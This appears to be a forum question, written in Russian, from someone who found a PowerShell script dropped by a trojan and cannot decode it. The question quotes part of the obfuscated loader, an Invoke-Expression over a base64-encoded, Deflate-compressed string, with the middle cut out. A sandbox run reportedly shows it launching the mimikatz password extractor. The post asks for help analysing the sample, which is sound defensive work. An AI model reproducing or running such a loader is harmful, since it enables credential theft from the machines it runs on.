Я нашел скрипт powershell, сброшенный трояном, я не знаком с powershell. Так что мне просто интересно посмотреть, как это выглядит внутри, но скрипт закодирован, и я не могу декодировать с помощью базовых средств декодирования base64.
Я пробовал эти решения:
Декодирование base64 с powershell .
https://www.base64decode.org/
и приложение base64decoder от разработчика с файлом encoded.dec, но это также не дает результатов, говоря, что что-то не является символом base64.
Invoke-Expression $ (New-Object IO.StreamReader ($ (New-Object IO.Compression.DeflateStream ($ (New-Object IO.MemoryStream (, $ ([Конвертировать] :: FromBase64String ( '7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ /
... 499 слов страниц позже ...
V6CuHdj + nTu / cfL / AA == ')))), [IO.Compression.CompressionMode] :: Decompress)), [Text.Encoding] :: ASCII)). ReadToEnd ();
Я не уверен, каким должен быть вывод, поскольку у меня нет опыта работы со скриптами PowerShell. Я запустил скрипт на веб-сайте с песочницей под именем app.any.run, и он открывает средство извлечения пароля «mimikatz».